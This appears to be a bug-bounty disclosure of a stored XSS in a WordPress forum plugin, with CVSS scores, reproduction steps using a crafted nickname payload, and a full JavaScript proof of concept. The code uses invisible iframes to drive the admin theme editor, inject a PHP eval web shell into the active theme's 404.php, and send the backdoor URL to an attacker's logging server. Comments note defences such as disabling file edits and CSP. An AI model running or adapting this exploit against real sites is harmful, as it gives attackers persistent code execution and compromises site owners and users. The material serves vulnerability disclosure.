3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
0.004 Low
EPSS
Percentile
71.3%
#Intro:
Encouraged by the success of Cure53 and their reward, I started researching the plugins in your scope, and almost immediately found a critical stored XSS, which of course leads to privilege escalation or PHP code execution. This vulnerability does not require “special” privileges like CVE-2015-5622 does. To demonstrate how elementary this vulnerability is to exploit, I wrote an XSS-to-shell exploit.
#Steps to reproduce the XSS:
Send any message in a topic or start a new topic.
Edit this message.
Open http://localhost/wordpress/?bbp_user=%YOUR_USER_ID%&edit=1
Edit your “Nickname” to:
user1"onmouseover="alert(1);remove()"style="position:absolute;left:0;top:0;margin-top:-100%;margin-left:-100%;width:5000px;height:5000px"
Change your “Display Name” to the new “Nickname”, save, and return to the thread containing your message.
#Screenshot:
{F10472} (In attachment)
#XSS to RCE PoC exploit:
// PoC configuration. Both placeholders are left for the reporter to fill in:
// an out-of-band logging endpoint and the PHP snippet that gets written into
// the theme file. A PHP eval() over a GET parameter is the classic web-shell
// pattern; file-integrity monitoring of wp-content/themes is the detection
// control that catches this regardless of how the write happened.
var yourServer = "%Path to your logger%"
var payload = "<?php eval($_GET['wp']); ?>"+"\n";
// Site root is read from the pingback <link> in <head>. Assigned without
// `var`, so it becomes an implicit global that eas() and the iframe setup
// below depend on.
SitePath = document.head.innerHTML.match(/rel=\"pingback\" href=\"(.*?)\/xmlrpc.php\"/m)[1]
function eas(){ // edit and save: onload handler of the hidden 404.php editor iframe
// Prepend the PHP snippet to the existing file contents. Because this is the
// real theme-editor form loaded inside the victim's own authenticated session,
// the submission below carries whatever the editor normally sends, so the
// server cannot distinguish it from a legitimate edit. Defining
// DISALLOW_FILE_EDIT removes the editor entirely and breaks this step.
ov = window.frames.win404.document.getElementById('newcontent').value
window.frames.win404.document.getElementById('newcontent').value = payload + ov
// Clear the iframe's onload before submitting so the post-submit page load
// does not re-run this handler and prepend the snippet a second time.
document.getElementsByName('win404')[0].setAttribute("onload","");
window.frames.win404.document.getElementsByName('submit')[0].click()
// Out-of-band notification to the attacker-controlled logger via an Image
// request. An image fetch to a third-party host fired from a wp-admin page is
// the kind of egress a CSP img-src restriction would block or report.
((new Image).src=yourServer+"?message=Check your backdoor here: "+SitePath+"/wp-content/themes/"+themeName+"/404.php?wp=phpinfo();")
}
function pao(){ // parse and open: onload handler of the hidden theme-editor iframe
// Locate the first file link in the editor's template sidebar; the PoC treats
// it as the 404.php template of the active theme (as named in the beacon URL).
ewin = window.frames.editor.contentWindow || window.frames.contentDocument
url404 = unescape(ewin.document.getElementById('templateside').getElementsByTagName('a')[0].href)
filepar = url404.match(/\?file\=(.*?)\&/m)[1]
// Two formats of the editor link are handled: a long `file=/themes/<name>/...`
// path and a short `file=` with a separate `theme=` parameter. Presumably these
// correspond to different WordPress versions — not verifiable from this script.
if(filepar.length>10){
themeName = url404.match(/file\=\/themes\/(.*?)\//m)[1]
}
else{
themeName = url404.match(/theme\=(.*?)$/m)[1]
}
// Second invisible iframe: loads the editor page for that file and hands off
// to eas() once it has loaded. The chain of hidden same-origin iframes is
// what turns a single stored XSS into an authenticated file write; escaping
// the nickname on output is the root-cause fix.
var win404 = document.createElement("iframe");
win404.style.opacity=0
win404.name = 'win404';
win404.src = url404
win404.setAttribute("onload","eas();this.onload=''");
document.body.appendChild(win404);
}
// Entry point of the PoC: open the theme editor in an invisible iframe so it
// loads with the viewing user's privileges, then continue in pao() on load.
// The whole chain only works when the user who renders the injected nickname
// may edit theme files; the impact on lower-privileged viewers is the XSS alone.
var editor = document.createElement("iframe");
editor.style.opacity=0
editor.name = 'editor';
editor.src = SitePath+"/wp-admin/theme-editor.php";
editor.setAttribute("onload","pao();this.onload='';");
document.body.appendChild(editor);
Best regards!